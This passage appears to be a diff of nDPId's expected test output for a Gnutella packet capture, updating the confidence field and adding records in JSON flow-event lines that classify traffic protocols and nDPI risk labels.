-00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -01223{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":21843,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63965,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90739,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"97.83.183.148","src_port":50293,"dst_port":8890,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":296,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1119,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"194.163.180.126","src_port":50320,"dst_port":10825,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90745,"flow_last_seen":91127,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.37.255.130","src_port":50308,"dst_port":61616,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":291,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90746,"flow_last_seen":91171,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":690,"flow_tot_l4_payload_len":1789,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.31.152.112","src_port":50315,"dst_port":26851,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90744,"flow_last_seen":90809,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1114,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":50303,"dst_port":24562,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90740,"flow_last_seen":91277,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":1764,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":50295,"dst_port":49732,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":83805,"flow_last_seen":84251,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50267,"dst_port":9239,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":90740,"flow_last_seen":91408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":853,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"77.58.211.52","src_port":50296,"dst_port":3806,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90742,"flow_last_seen":91375,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":877,"flow_avg_l4_payload_len":87,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":50299,"dst_port":1194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":294,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":90746,"flow_last_seen":91439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3759,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":50318,"dst_port":59596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":90864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":86,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":50298,"dst_port":6578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +01223{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":90746,"flow_last_seen":90948,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3245,"flow_avg_l4_payload_len":154,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.7.252.192","src_port":50314,"dst_port":6888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":84592,"flow_last_seen":85055,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1144,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"210.209.249.84","src_port":50268,"dst_port":24751,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90741,"flow_last_seen":91415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":903,"flow_avg_l4_payload_len":90,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3291,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":299,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90747,"flow_last_seen":90850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1111,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":211646,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":50323,"dst_port":26253,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":219447,"flow_last_seen":219447,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":219447,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.187.171.240","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3367,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":219447,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":219447,"pkt":"UlQAEjUCCAAn5uVZCABFAABD+bUAAIARLzoKAAIPWbur8HAJGMoAL2mkIFAxArFAxy3\/Egk2kZ9VAwABABAAAADDA1NDUEECglZDRUdUS0di"} -00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3391,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":12827,"flow_last_seen":41755,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":966,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":222018,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 